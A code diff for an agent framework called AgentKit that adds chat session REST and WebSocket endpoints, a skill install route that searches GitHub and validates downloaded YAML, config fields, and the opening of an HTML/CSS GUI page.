app.state.session_manager = SessionManager(store=session_store)
# Initialize evolution store if configured # Initialize evolution store if configured
if server_config and hasattr(server_config, 'evolution') and server_config.evolution: if server_config and hasattr(server_config, 'evolution') and server_config.evolution:
try: try:
@ -431,5 +590,22 @@ def create_app(
app.include_router(kb_management.router, prefix="/api/v1") app.include_router(kb_management.router, prefix="/api/v1")
app.include_router(skill_management.router, prefix="/api/v1") app.include_router(skill_management.router, prefix="/api/v1")
app.include_router(workflows.router, prefix="/api/v1") app.include_router(workflows.router, prefix="/api/v1")
app.include_router(chat.router, prefix="/api/v1")
# Serve GUI when in GUI mode
gui_mode = os.environ.get("AGENTKIT_GUI_MODE")
if gui_mode:
from pathlib import Path as _Path
from fastapi.responses import HTMLResponse, FileResponse
_static_dir = _Path(__file__).parent / "static"
@app.get("/", response_class=HTMLResponse, include_in_schema=False)
async def gui_index():
"""Serve the GUI index page."""
index_path = _static_dir / "index.html"
if index_path.exists():
return FileResponse(str(index_path))
return HTMLResponse("<h1>AgentKit GUI not found</h1>", status_code=404)
return app return app

View File

@ -106,6 +106,8 @@ class ServerConfig:
mcp_servers: dict[str, MCPServerConfig] | None = None, mcp_servers: dict[str, MCPServerConfig] | None = None,
telemetry: dict[str, Any] | None = None, telemetry: dict[str, Any] | None = None,
compression: dict[str, Any] | None = None, compression: dict[str, Any] | None = None,
session: dict[str, Any] | None = None,
bus: dict[str, Any] | None = None,
on_change: Callable[["ServerConfig"], None] | None = None, on_change: Callable[["ServerConfig"], None] | None = None,
): ):
self.host = host self.host = host
@ -124,6 +126,8 @@ class ServerConfig:
self.mcp_servers = mcp_servers or {} self.mcp_servers = mcp_servers or {}
self.telemetry = telemetry or {} self.telemetry = telemetry or {}
self.compression = compression or {} self.compression = compression or {}
self.session = session or {}
self.bus = bus or {}
self.on_change = on_change self.on_change = on_change
# Config watching state # Config watching state
@ -131,6 +135,13 @@ class ServerConfig:
self._watcher_task: asyncio.Task | None = None self._watcher_task: asyncio.Task | None = None
self._last_mtime: float = 0.0 self._last_mtime: float = 0.0
def has_llm_provider(self) -> bool:
"""检查是否配置了有效的 LLM ProviderAPI Key 非空)"""
for name, provider in self.llm_config.providers.items():
if provider.api_key:
return True
return False
@classmethod @classmethod
def from_yaml(cls, path: str) -> "ServerConfig": def from_yaml(cls, path: str) -> "ServerConfig":
"""Load configuration from a YAML file.""" """Load configuration from a YAML file."""
@ -172,6 +183,9 @@ class ServerConfig:
# Compression config # Compression config
compression_data = data.get("compression", {}) compression_data = data.get("compression", {})
# Session config
session_data = data.get("session", {})
return cls( return cls(
host=server.get("host", "0.0.0.0"), host=server.get("host", "0.0.0.0"),
port=server.get("port", 8001), port=server.get("port", 8001),
@ -189,6 +203,8 @@ class ServerConfig:
mcp_servers=mcp_servers, mcp_servers=mcp_servers,
telemetry=telemetry_data, telemetry=telemetry_data,
compression=compression_data, compression=compression_data,
session=session_data,
bus=server.get("bus"),
) )
@staticmethod @staticmethod
@ -380,6 +396,7 @@ class ServerConfig:
self.mcp_servers = new_config.mcp_servers self.mcp_servers = new_config.mcp_servers
self.telemetry = new_config.telemetry self.telemetry = new_config.telemetry
self.compression = new_config.compression self.compression = new_config.compression
self.session = new_config.session
self._last_mtime = new_config._last_mtime self._last_mtime = new_config._last_mtime
logger.info(f"Config reloaded from {path}") logger.info(f"Config reloaded from {path}")

View File

@ -0,0 +1,462 @@
"""Chat API routes — multi-turn conversation with Agent via REST and WebSocket."""
from __future__ import annotations
import asyncio
import json
import logging
from typing import Any
from fastapi import APIRouter, HTTPException, WebSocket, WebSocketDisconnect, Request
from pydantic import BaseModel
from agentkit.core.protocol import CancellationToken
from agentkit.core.react import ReActEngine
from agentkit.session.manager import SessionManager
from agentkit.session.models import MessageRole, SessionStatus
logger = logging.getLogger(__name__)
router = APIRouter(prefix="/chat", tags=["chat"])
# ── Request/Response schemas ──────────────────────────────────────────
class CreateSessionRequest(BaseModel):
agent_name: str
metadata: dict[str, Any] | None = None
class SendMessageRequest(BaseModel):
content: str
role: str = "user"
class SessionResponse(BaseModel):
session_id: str
agent_name: str
status: str
metadata: dict[str, Any]
created_at: str
updated_at: str
class MessageResponse(BaseModel):
message_id: str
session_id: str
role: str
content: str
tool_call_id: str | None = None
agent_name: str | None = None
created_at: str
# ── Chat WebSocket connection manager ─────────────────────────────────
class ChatConnectionManager:
"""Track active WebSocket connections per session_id."""
def __init__(self) -> None:
# session_id -> list of (websocket, pending_replies)
self._connections: dict[str, list[tuple[WebSocket, dict[str, asyncio.Future]]]] = {}
def add(self, session_id: str, ws: WebSocket, pending: dict[str, asyncio.Future]) -> None:
self._connections.setdefault(session_id, []).append((ws, pending))
def remove(self, session_id: str, ws: WebSocket) -> None:
conns = self._connections.get(session_id)
if conns is None:
return
self._connections[session_id] = [(w, p) for w, p in conns if w is not ws]
if not self._connections[session_id]:
del self._connections[session_id]
def get_connections(self, session_id: str) -> list[tuple[WebSocket, dict[str, asyncio.Future]]]:
return self._connections.get(session_id, [])
async def send_json(self, session_id: str, message: dict) -> None:
"""Send a JSON message to all connections for a session."""
conns = self._connections.get(session_id, [])
stale: list[WebSocket] = []
for ws, _ in conns:
try:
await ws.send_json(message)
except Exception:
stale.append(ws)
for ws in stale:
self.remove(session_id, ws)
chat_manager = ChatConnectionManager()
# ── Helper ────────────────────────────────────────────────────────────
def _get_session_manager(request: Request) -> SessionManager:
return request.app.state.session_manager
def _session_to_response(session) -> SessionResponse:
return SessionResponse(
session_id=session.session_id,
agent_name=session.agent_name,
status=session.status.value,
metadata=session.metadata,
created_at=session.created_at.isoformat(),
updated_at=session.updated_at.isoformat(),
)
def _message_to_response(msg) -> MessageResponse:
return MessageResponse(
message_id=msg.message_id,
session_id=msg.session_id,
role=msg.role.value,
content=msg.content,
tool_call_id=msg.tool_call_id,
agent_name=msg.agent_name,
created_at=msg.created_at.isoformat(),
)
# ── REST endpoints ────────────────────────────────────────────────────
@router.get("/sessions", response_model=list[SessionResponse])
async def list_sessions(req: Request):
"""List all chat sessions."""
sm = _get_session_manager(req)
sessions = await sm.list_sessions()
return [_session_to_response(s) for s in sessions]
@router.post("/sessions", response_model=SessionResponse)
async def create_session(request: CreateSessionRequest, req: Request):
"""Create a new chat session bound to an Agent."""
sm = _get_session_manager(req)
session = await sm.create_session(
agent_name=request.agent_name,
metadata=request.metadata,
)
return _session_to_response(session)
@router.get("/sessions/{session_id}", response_model=SessionResponse)
async def get_session(session_id: str, req: Request):
"""Get session information."""
sm = _get_session_manager(req)
session = await sm.get_session(session_id)
if session is None:
raise HTTPException(status_code=404, detail=f"Session '{session_id}' not found")
return _session_to_response(session)
@router.get("/sessions/{session_id}/messages", response_model=list[MessageResponse])
async def get_messages(session_id: str, req: Request, limit: int | None = None, offset: int = 0):
"""Get conversation history for a session."""
sm = _get_session_manager(req)
session = await sm.get_session(session_id)
if session is None:
raise HTTPException(status_code=404, detail=f"Session '{session_id}' not found")
messages = await sm.get_messages(session_id, limit=limit, offset=offset)
return [_message_to_response(m) for m in messages]
@router.post("/sessions/{session_id}/messages", response_model=MessageResponse)
async def send_message(session_id: str, request: SendMessageRequest, req: Request):
"""Send a message to the Agent (synchronous mode — waits for full reply)."""
sm = _get_session_manager(req)
session = await sm.get_session(session_id)
if session is None:
raise HTTPException(status_code=404, detail=f"Session '{session_id}' not found")
if session.status == SessionStatus.CLOSED:
raise HTTPException(status_code=400, detail=f"Session '{session_id}' is closed")
# Append user message
user_msg = await sm.append_message(
session_id=session_id,
role=MessageRole.USER,
content=request.content,
)
# Get full conversation history for the Agent
chat_messages = await sm.get_chat_messages(session_id)
# Resolve the Agent
pool = req.app.state.agent_pool
agent = pool.get_agent(session.agent_name)
if agent is None:
raise HTTPException(status_code=404, detail=f"Agent '{session.agent_name}' not found")
# Execute the Agent
try:
react_engine = ReActEngine(llm_gateway=req.app.state.llm_gateway)
tools = agent._tool_registry.list_tools() if agent._tool_registry else []
system_prompt = getattr(agent, "_system_prompt", None) or (agent.get_system_prompt() if hasattr(agent, "get_system_prompt") else None)
result = await react_engine.execute(
messages=chat_messages,
tools=tools,
model=agent.get_model() if hasattr(agent, "get_model") else getattr(agent, "_llm_model", "default"),
agent_name=agent.name,
system_prompt=system_prompt,
)
# Append assistant reply
assistant_msg = await sm.append_message(
session_id=session_id,
role=MessageRole.ASSISTANT,
content=result.output if hasattr(result, "output") else str(result),
agent_name=agent.name,
)
return _message_to_response(assistant_msg)
except Exception as e:
logger.error(f"Chat execution error for session {session_id}: {e}")
raise HTTPException(status_code=500, detail=str(e))
@router.delete("/sessions/{session_id}")
async def close_session(session_id: str, req: Request):
"""Close a chat session."""
sm = _get_session_manager(req)
session = await sm.close_session(session_id)
if session is None:
raise HTTPException(status_code=404, detail=f"Session '{session_id}' not found")
return {"status": "closed", "session_id": session_id}
# ── WebSocket endpoint ────────────────────────────────────────────────
@router.websocket("/ws/{session_id}")
async def chat_websocket(websocket: WebSocket, session_id: str) -> None:
"""WebSocket endpoint for real-time chat with streaming.
Client Server messages:
{"type": "message", "content": "..."} Send a user message
{"type": "cancel"} Cancel current execution
{"type": "ping"} Heartbeat
Server Client messages:
{"type": "connected", "session_id": "..."} Connection confirmed
{"type": "token", "content": "..."} LLM token streaming
{"type": "step", "data": {...}} ReAct step event
{"type": "ask_human", "question": "...", "request_id": "..."} Agent asks user
{"type": "final_answer", "content": "..."} Agent's final reply
{"type": "error", "data": {"message": "..."}} Error occurred
{"type": "pong"} Heartbeat response
"""
# Authentication
configured_api_key: str | None = None
if hasattr(websocket.app.state, "server_config") and websocket.app.state.server_config:
configured_api_key = websocket.app.state.server_config.api_key
if configured_api_key is None and hasattr(websocket.app.state, "api_key"):
configured_api_key = websocket.app.state.api_key
if configured_api_key:
provided = websocket.query_params.get("api_key")
if provided != configured_api_key:
await websocket.accept()
await websocket.send_json({"type": "error", "data": {"message": "Invalid api_key"}})
await websocket.close(code=4001, reason="Invalid api_key")
return
await websocket.accept()
# Validate session
sm: SessionManager = websocket.app.state.session_manager
session = await sm.get_session(session_id)
if session is None:
await websocket.send_json({"type": "error", "data": {"message": f"Session '{session_id}' not found"}})
await websocket.close(code=1000, reason="Session not found")
return
if session.status == SessionStatus.CLOSED:
await websocket.send_json({"type": "error", "data": {"message": "Session is closed"}})
await websocket.close(code=1000, reason="Session closed")
return
# Track pending replies for AskHumanTool
pending_replies: dict[str, asyncio.Future] = {}
chat_manager.add(session_id, websocket, pending_replies)
cancellation_token = CancellationToken()
try:
await websocket.send_json({"type": "connected", "session_id": session_id})
# Listen for client messages
while True:
try:
raw = await asyncio.wait_for(websocket.receive_text(), timeout=300.0)
except asyncio.TimeoutError:
await websocket.send_json({"type": "pong"})
continue
try:
msg = json.loads(raw)
except json.JSONDecodeError:
continue
msg_type = msg.get("type")
if msg_type == "message":
content = msg.get("content", "")
# Create a fresh CancellationToken for each message
message_token = CancellationToken()
await _handle_chat_message(
websocket, session_id, content, sm, message_token, pending_replies
)
elif msg_type == "reply":
# Reply to AskHumanTool
request_id = msg.get("request_id")
reply_content = msg.get("content", "")
if request_id and request_id in pending_replies:
pending_replies[request_id].set_result(reply_content)
elif msg_type == "cancel":
cancellation_token.cancel()
await websocket.send_json({"type": "result", "data": {"status": "cancelled"}})
elif msg_type == "ping":
await websocket.send_json({"type": "pong"})
except WebSocketDisconnect:
logger.debug(f"Chat WebSocket disconnected for session {session_id}")
except Exception as e:
logger.error(f"Chat WebSocket error for session {session_id}: {e}")
try:
await websocket.send_json({"type": "error", "data": {"message": str(e)}})
except Exception:
pass
finally:
# Clean up pending futures
for fut in pending_replies.values():
if not fut.done():
fut.cancel()
chat_manager.remove(session_id, websocket)
async def _handle_chat_message(
websocket: WebSocket,
session_id: str,
content: str,
sm: SessionManager,
cancellation_token: CancellationToken,
pending_replies: dict[str, asyncio.Future],
) -> None:
"""Handle a user message: append to session, execute Agent, stream events.
When skills are registered, attempts to route the user's message to a
matching skill via IntentRouter. If a skill is matched, the skill's
prompt, tools, and execution_mode are used instead of the default agent's.
"""
from agentkit.chat.skill_routing import resolve_skill_routing
# Resolve Agent first (needed for default tools/prompt)
pool = websocket.app.state.agent_pool
session = await sm.get_session(session_id)
if session is None:
await websocket.send_json({"type": "error", "data": {"message": "Session lost"}})
return
agent = pool.get_agent(session.agent_name)
if agent is None:
await websocket.send_json({"type": "error", "data": {"message": f"Agent '{session.agent_name}' not found"}})
return
# Default execution parameters from agent
default_tools = agent._tool_registry.list_tools() if agent._tool_registry else []
default_system_prompt = getattr(agent, "_system_prompt", None) or (agent.get_system_prompt() if hasattr(agent, "get_system_prompt") else None)
default_model = agent.get_model() if hasattr(agent, "get_model") else getattr(agent, "_llm_model", "default")
# Resolve skill routing using shared module
skill_registry = getattr(websocket.app.state, "skill_registry", None)
intent_router = getattr(websocket.app.state, "intent_router", None)
routing = await resolve_skill_routing(
content=content,
skill_registry=skill_registry,
intent_router=intent_router,
default_tools=default_tools,
default_system_prompt=default_system_prompt,
default_model=default_model,
default_agent_name=agent.name,
agent_tool_registry=agent._tool_registry if agent._tool_registry else None,
session_id=session_id,
)
# Notify frontend about skill match
if routing.matched:
await websocket.send_json({
"type": "skill_match",
"data": {
"skill": routing.skill_name,
"method": routing.match_method,
"confidence": routing.match_confidence,
},
})
# Append user message (use clean_content if @skill: prefix was stripped)
await sm.append_message(session_id=session_id, role=MessageRole.USER, content=routing.clean_content)
# Get full conversation history
chat_messages = await sm.get_chat_messages(session_id)
# Execute Agent with streaming
react_engine = ReActEngine(llm_gateway=websocket.app.state.llm_gateway)
logger.info(f"Chat session {session_id}: executing with {len(routing.tools)} tools, model={routing.model}, skill={routing.skill_name}")
try:
final_content = ""
async for event in react_engine.execute_stream(
messages=chat_messages,
tools=routing.tools,
model=routing.model,
agent_name=routing.agent_name,
system_prompt=routing.system_prompt,
cancellation_token=cancellation_token,
):
if event.event_type == "final_answer":
final_content = event.data.get("output", "")
await websocket.send_json({
"type": "final_answer",
"content": final_content,
})
elif event.event_type == "token":
await websocket.send_json({
"type": "token",
"content": event.data.get("content", ""),
})
else:
await websocket.send_json({
"type": "step",
"data": {
"event_type": event.event_type,
"step": event.step,
"data": event.data,
},
})
# Append assistant reply to session
if final_content:
await sm.append_message(
session_id=session_id,
role=MessageRole.ASSISTANT,
content=final_content,
agent_name=agent.name,
)
except Exception as e:
logger.error(f"Chat execution error for session {session_id}: {e}")
# Show meaningful error to user, but avoid leaking full stack traces
error_msg = str(e)
# Truncate very long error messages
if len(error_msg) > 200:
error_msg = error_msg[:200] + "..."
await websocket.send_json({"type": "error", "data": {"message": error_msg}})

View File

@ -1,7 +1,11 @@
"""Skill registration routes""" """Skill registration routes"""
import logging import logging
import os
import re
import urllib.parse
import httpx
from fastapi import APIRouter, HTTPException, Request from fastapi import APIRouter, HTTPException, Request
from pydantic import BaseModel from pydantic import BaseModel
from typing import Any from typing import Any
@ -13,6 +17,87 @@ logger = logging.getLogger(__name__)
router = APIRouter(tags=["skills"]) router = APIRouter(tags=["skills"])
# Strict skill name validation: lowercase alphanumeric, hyphens, underscores
_SKILL_NAME_RE = re.compile(r"^[a-z0-9][a-z0-9_-]{0,63}$")
# Allowed domains for source URL downloads (SSRF mitigation)
_ALLOWED_DOWNLOAD_DOMAINS = {
"raw.githubusercontent.com",
"github.com",
"gist.githubusercontent.com",
}
def _validate_skill_name(name: str) -> str:
"""Validate and normalize a skill name. Raises HTTPException on invalid input."""
normalized = name.strip().lower()
if not _SKILL_NAME_RE.match(normalized):
raise HTTPException(
status_code=400,
detail=f"Invalid skill name '{name}': must contain only lowercase letters, digits, hyphens, and underscores (1-64 chars)",
)
return normalized
def _get_skills_dir(req: Request) -> str:
"""Get the skills directory from server_config, falling back to configs/skills/."""
server_config = getattr(req.app.state, "server_config", None)
if server_config and server_config.skill_paths:
# Use the first configured skill path as the install target
from pathlib import Path as _P
first_path = _P(server_config.skill_paths[0])
if first_path.is_dir():
return str(first_path)
# Fallback: configs/skills/ relative to project root
return os.path.join(os.getcwd(), "configs", "skills")
def _validate_source_url(source: str) -> None:
"""Validate that a source URL points to an allowed domain (SSRF mitigation)."""
from urllib.parse import urlparse
parsed = urlparse(source)
if parsed.scheme not in ("https", "http"):
raise HTTPException(status_code=400, detail=f"Invalid source URL scheme: only http/https allowed")
# Block private/internal IPs by checking hostname
import ipaddress
import socket
hostname = parsed.hostname
if hostname:
try:
# Resolve hostname to check for private IPs
resolved = socket.getaddrinfo(hostname, None)
for family, type_, proto, canonname, sockaddr in resolved:
ip = ipaddress.ip_address(sockaddr[0])
if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
raise HTTPException(
status_code=400,
detail="Source URL points to a private/internal address — not allowed",
)
except socket.gaierror:
pass # DNS resolution failed, let httpx handle it
# Check domain allowlist for source URLs
if hostname and hostname not in _ALLOWED_DOWNLOAD_DOMAINS:
# Allow but log a warning for non-allowlisted domains
logger.warning(f"Source URL domain '{hostname}' is not in the allowlist: {_ALLOWED_DOWNLOAD_DOMAINS}")
def _validate_yaml_content(content: str) -> dict:
"""Validate YAML content before writing to disk. Returns parsed dict."""
import yaml
try:
data = yaml.safe_load(content)
except yaml.YAMLError as e:
raise HTTPException(status_code=400, detail=f"Invalid YAML content: {e}")
if not isinstance(data, dict):
raise HTTPException(status_code=400, detail="Skill YAML must be a mapping/dict")
# Require at least a 'name' field
if "name" not in data:
raise HTTPException(status_code=400, detail="Skill YAML must contain a 'name' field")
return data
class RegisterSkillRequest(BaseModel): class RegisterSkillRequest(BaseModel):
config: dict[str, Any] config: dict[str, Any]
@ -27,6 +112,11 @@ class ExecutePipelineRequest(BaseModel):
input_data: dict[str, Any] input_data: dict[str, Any]
class InstallSkillRequest(BaseModel):
name: str
source: str | None = None # Optional: URL or "github:user/repo/path"
@router.post("/skills", status_code=201) @router.post("/skills", status_code=201)
async def register_skill(request: RegisterSkillRequest, req: Request): async def register_skill(request: RegisterSkillRequest, req: Request):
"""Register a Skill""" """Register a Skill"""
@ -50,7 +140,7 @@ async def register_skill(request: RegisterSkillRequest, req: Request):
@router.get("/skills") @router.get("/skills")
async def list_skills(req: Request): async def list_skills(req: Request):
"""List all skills""" """List all skills with full metadata"""
skill_registry = req.app.state.skill_registry skill_registry = req.app.state.skill_registry
skills = skill_registry.list_skills() skills = skill_registry.list_skills()
return [ return [
@ -58,12 +148,182 @@ async def list_skills(req: Request):
"name": s.name, "name": s.name,
"agent_type": s.config.agent_type, "agent_type": s.config.agent_type,
"version": s.config.version, "version": s.config.version,
"description": s.config.description, "description": s.config.description or "",
"task_mode": s.config.task_mode or "",
"intent_keywords": s.config.intent.keywords if s.config.intent else [],
"intent_description": s.config.intent.description if s.config.intent else "",
"tools": s.config.tools or [],
"bound_tools": [t.name for t in (s.tools or [])],
"prompt_identity": (s.config.prompt or {}).get("identity", ""),
} }
for s in skills for s in skills
] ]
@router.post("/skills/install")
async def install_skill(request: InstallSkillRequest, req: Request):
"""Search for and install a skill by name.
Searches GitHub for agentkit-skill YAML files matching the name,
downloads the first match, saves it to configs/skills/, and registers it.
"""
skill_name = _validate_skill_name(request.name)
source = request.source
skill_registry = req.app.state.skill_registry
tool_registry = getattr(req.app.state, "tool_registry", None)
# If source URL is provided directly, download from it
if source and source.startswith("http"):
_validate_source_url(source)
try:
async with httpx.AsyncClient(timeout=30, follow_redirects=True, max_redirects=3) as client:
resp = await client.get(source)
resp.raise_for_status()
yaml_content = resp.text
except Exception as e:
raise HTTPException(status_code=400, detail=f"Failed to download from source: {e}")
elif source and source.startswith("file://"):
# Read from local file path
local_path = source[7:] # strip "file://"
if not os.path.exists(local_path):
raise HTTPException(status_code=404, detail=f"Local file not found: {local_path}")
# Verify the path is within the skills directory
skills_dir_base = _get_skills_dir(req)
if not os.path.realpath(local_path).startswith(os.path.realpath(skills_dir_base)):
raise HTTPException(status_code=400, detail="Local file path must be within the skills directory")
try:
with open(local_path, encoding="utf-8") as f:
yaml_content = f.read()
except Exception as e:
raise HTTPException(status_code=400, detail=f"Failed to read local file: {e}")
else:
# Search GitHub for skills (YAML config files)
search_query = f"{skill_name} skill config filename:yaml"
encoded_query = urllib.parse.quote(search_query)
github_api = f"https://api.github.com/search/code?q={encoded_query}&per_page=5"
try:
async with httpx.AsyncClient(timeout=15) as client:
gh_resp = await client.get(
github_api,
headers={
"Accept": "application/vnd.github.v3+json",
"User-Agent": "agentkit",
},
)
gh_data = gh_resp.json()
except Exception as e:
raise HTTPException(status_code=502, detail=f"GitHub search failed: {e}")
items = gh_data.get("items", [])
if not items:
# Fallback: try a simpler search
search_query2 = f"{skill_name} skill"
encoded_query2 = urllib.parse.quote(search_query2)
github_api2 = f"https://api.github.com/search/code?q={encoded_query2}+extension:yaml&per_page=5"
try:
async with httpx.AsyncClient(timeout=15) as client:
gh_resp2 = await client.get(
github_api2,
headers={"Accept": "application/vnd.github.v3+json", "User-Agent": "agentkit"},
)
items = gh_resp2.json().get("items", [])
except Exception:
items = []
if not items:
raise HTTPException(status_code=404, detail=f"No skill found matching '{skill_name}'")
# Download the first matching file
item = items[0]
raw_url = item.get("html_url", "")
if raw_url:
# Validate the URL is from github.com before transforming
if not raw_url.startswith("https://github.com/"):
raise HTTPException(status_code=400, detail="Search result URL is not from github.com")
raw_url = raw_url.replace("github.com", "raw.githubusercontent.com").replace("/blob/", "/")
else:
raise HTTPException(status_code=404, detail="Could not construct download URL")
try:
async with httpx.AsyncClient(timeout=30, follow_redirects=True, max_redirects=3) as client:
resp = await client.get(raw_url)
resp.raise_for_status()
yaml_content = resp.text
except Exception as e:
raise HTTPException(status_code=400, detail=f"Failed to download skill: {e}")
# Validate YAML content before writing to disk
_validate_yaml_content(yaml_content)
# Save to skills directory (config-driven path)
skills_dir = _get_skills_dir(req)
os.makedirs(skills_dir, exist_ok=True)
file_path = os.path.join(skills_dir, f"{skill_name}.yaml")
# Verify resolved path stays within skills_dir (path traversal protection)
if not os.path.realpath(file_path).startswith(os.path.realpath(skills_dir)):
raise HTTPException(status_code=400, detail="Invalid path: escapes skills directory")
with open(file_path, "w", encoding="utf-8") as f:
f.write(yaml_content)
# Load and register the skill
registration_ok = False
try:
from agentkit.skills.loader import SkillLoader
loader = SkillLoader(
skill_registry=skill_registry,
tool_registry=tool_registry,
)
loader.load_from_file(file_path)
registration_ok = True
except Exception as e:
logger.warning(f"Failed to register installed skill: {e}")
if not registration_ok:
# Remove the invalid YAML file and report error
try:
os.remove(file_path)
except Exception:
pass
raise HTTPException(status_code=500, detail=f"Skill downloaded but registration failed")
return {
"status": "installed",
"name": skill_name,
"path": file_path,
}
@router.delete("/skills/{name}")
async def uninstall_skill(name: str, req: Request):
"""Unregister a skill and optionally remove its YAML file."""
# Validate name to prevent path traversal
validated_name = _validate_skill_name(name)
skill_registry = req.app.state.skill_registry
try:
skill_registry.get(validated_name)
except Exception:
raise HTTPException(status_code=404, detail=f"Skill '{name}' not found")
# Remove from registry
skill_registry.unregister(validated_name)
# Remove the YAML file (config-driven path)
skills_dir = _get_skills_dir(req)
yaml_path = os.path.join(skills_dir, f"{validated_name}.yaml")
# Verify resolved path stays within skills_dir
if os.path.exists(yaml_path) and os.path.realpath(yaml_path).startswith(os.path.realpath(skills_dir)):
os.remove(yaml_path)
return {"status": "uninstalled", "name": validated_name}
# ---- Pipeline endpoints ---- # ---- Pipeline endpoints ----

View File

@ -185,7 +185,7 @@ async def _run_react_and_stream(
async for event in react_engine.execute_stream( async for event in react_engine.execute_stream(
messages=messages, messages=messages,
tools=tools, tools=tools,
model=agent._llm_model if hasattr(agent, "_llm_model") else "default", model=agent.get_model() if hasattr(agent, "get_model") else (agent._llm_model if hasattr(agent, "_llm_model") else "default"),
agent_name=agent.name, agent_name=agent.name,
system_prompt=agent._system_prompt if hasattr(agent, "_system_prompt") else None, system_prompt=agent._system_prompt if hasattr(agent, "_system_prompt") else None,
cancellation_token=cancellation_token, cancellation_token=cancellation_token,

View File

@ -0,0 +1,661 @@
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>AgentKit</title>
<link rel="icon" href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 100 100'><text y='.9em' font-size='90'>🤖</text></svg>">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Plus+Jakarta+Sans:ital,wght@0,300;0,400;0,500;0,600;0,700;1,400&display=swap" rel="stylesheet">
<style>
*,*::before,*::after{box-sizing:border-box;margin:0;padding:0}
:root{
--bg:#f8f7f4;
--surface:#ffffff;
--surface2:#f1f0ec;
--surface3:#e8e7e3;
--border:#e2e0db;
--border-light:#eceae6;
--text:#1a1a1a;
--text2:#737068;
--text3:#a09d95;
--primary:#3b5bdb;
--primary-hover:#2c4ac6;
--primary-light:#eef1fd;
--primary-subtle:#d4daf9;
--user-bg:#3b5bdb;
--user-text:#ffffff;
--agent-bg:#f1f0ec;
--agent-text:#1a1a1a;
--danger:#dc2626;
--danger-light:#fef2f2;
--success:#16a34a;
--success-light:#f0fdf4;
--warning:#d97706;
--radius-sm:8px;
--radius:12px;
--radius-lg:16px;
--radius-xl:20px;
--shadow-xs:0 1px 2px rgba(0,0,0,.04);
--shadow-sm:0 1px 3px rgba(0,0,0,.06),0 1px 2px rgba(0,0,0,.04);
--shadow-md:0 4px 12px rgba(0,0,0,.07),0 1px 3px rgba(0,0,0,.05);
--shadow-lg:0 8px 24px rgba(0,0,0,.09),0 2px 6px rgba(0,0,0,.05);
--sidebar-w:280px;
--right-w:340px;
--font:'Plus Jakarta Sans',-apple-system,BlinkMacSystemFont,'Segoe UI',Roboto,sans-serif;
}
html,body{height:100%;font-family:var(--font);background:var(--bg);color:var(--text);overflow:hidden;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}
.app{display:flex;height:100vh}
/* ── Left Sidebar ────────────────────────────────────────────── */
.sidebar{width:var(--sidebar-w);background:var(--surface);border-right:1px solid var(--border-light);display:flex;flex-direction:column;flex-shrink:0}
.sidebar-header{padding:20px 16px 16px;display:flex;align-items:center;justify-content:space-between}
.sidebar-brand{display:flex;align-items:center;gap:10px}
.sidebar-logo{width:32px;height:32px;background:var(--primary);border-radius:var(--radius-sm);display:flex;align-items:center;justify-content:center;color:#fff;font-size:16px;font-weight:700}
.sidebar-header h1{font-size:17px;font-weight:700;letter-spacing:-0.4px;color:var(--text)}
.btn-new{background:var(--primary-light);color:var(--primary);border:none;border-radius:var(--radius-sm);padding:7px 14px;font-size:13px;font-weight:600;cursor:pointer;transition:all .2s;font-family:var(--font)}
.btn-new:hover{background:var(--primary-subtle);transform:translateY(-1px)}
.session-list{flex:1;overflow-y:auto;padding:8px 8px 16px}
.session-item{padding:10px 12px;border-radius:var(--radius-sm);cursor:pointer;transition:all .15s;margin-bottom:2px;display:flex;align-items:center;justify-content:space-between;border:1px solid transparent}
.session-item:hover{background:var(--surface2);border-color:var(--border-light)}
.session-item.active{background:var(--primary-light);border-color:var(--primary-subtle);color:var(--primary)}
.session-item.active .title{font-weight:600}
.session-item .title{font-size:13px;white-space:nowrap;overflow:hidden;text-overflow:ellipsis;flex:1;font-weight:450}
.session-item .time{font-size:11px;color:var(--text3);margin-left:8px;flex-shrink:0}
.session-item .del{opacity:0;color:var(--danger);cursor:pointer;margin-left:6px;font-size:16px;flex-shrink:0;transition:opacity .15s;width:20px;height:20px;display:flex;align-items:center;justify-content:center;border-radius:4px}
.session-item:hover .del{opacity:.6}
.session-item .del:hover{opacity:1;background:var(--danger-light)}
.empty-state{color:var(--text3);font-size:13px;text-align:center;padding:40px 16px;line-height:1.7}
/* ── Main Chat Area ──────────────────────────────────────────── */
.chat-area{flex:1;display:flex;flex-direction:column;min-width:0;background:var(--bg)}
.chat-header{padding:12px 24px;border-bottom:1px solid var(--border-light);display:flex;align-items:center;gap:12px;background:var(--surface);box-shadow:var(--shadow-xs)}
.chat-header .agent-name{font-size:15px;font-weight:600;flex:1;letter-spacing:-0.2px}
.chat-header .status{font-size:12px;color:var(--text3);display:flex;align-items:center;gap:5px}
.chat-header .status::before{content:'';width:6px;height:6px;border-radius:50%;background:var(--text3);flex-shrink:0}
.chat-header .status.connected{color:var(--success)}
.chat-header .status.connected::before{background:var(--success)}
.btn-icon{background:var(--surface);border:1px solid var(--border);color:var(--text2);border-radius:var(--radius-sm);width:36px;height:36px;display:flex;align-items:center;justify-content:center;cursor:pointer;transition:all .2s;font-size:16px}
.btn-icon:hover{background:var(--surface2);color:var(--text);border-color:var(--primary);box-shadow:var(--shadow-xs)}
/* ── Messages ────────────────────────────────────────────────── */
.messages{flex:1;overflow-y:auto;padding:24px 24px 16px;display:flex;flex-direction:column;gap:20px;scroll-behavior:smooth}
.msg{display:flex;flex-direction:column;max-width:72%;animation:msgIn .35s cubic-bezier(.16,1,.3,1)}
.msg.user{align-self:flex-end}
.msg.agent{align-self:flex-start}
.msg .bubble{padding:12px 18px;font-size:14px;line-height:1.7;white-space:pre-wrap;word-break:break-word;position:relative}
.msg.user .bubble{background:var(--user-bg);color:var(--user-text);border-radius:var(--radius-lg) var(--radius-lg) var(--radius-sm) var(--radius-lg);box-shadow:0 2px 8px rgba(59,91,219,.2)}
.msg.agent .bubble{background:var(--surface);color:var(--agent-text);border-radius:var(--radius-lg) var(--radius-lg) var(--radius-lg) var(--radius-sm);border:1px solid var(--border-light);box-shadow:var(--shadow-xs)}
.msg .meta{font-size:11px;color:var(--text3);margin-top:5px;padding:0 4px;font-weight:500}
.msg.user .meta{text-align:right}
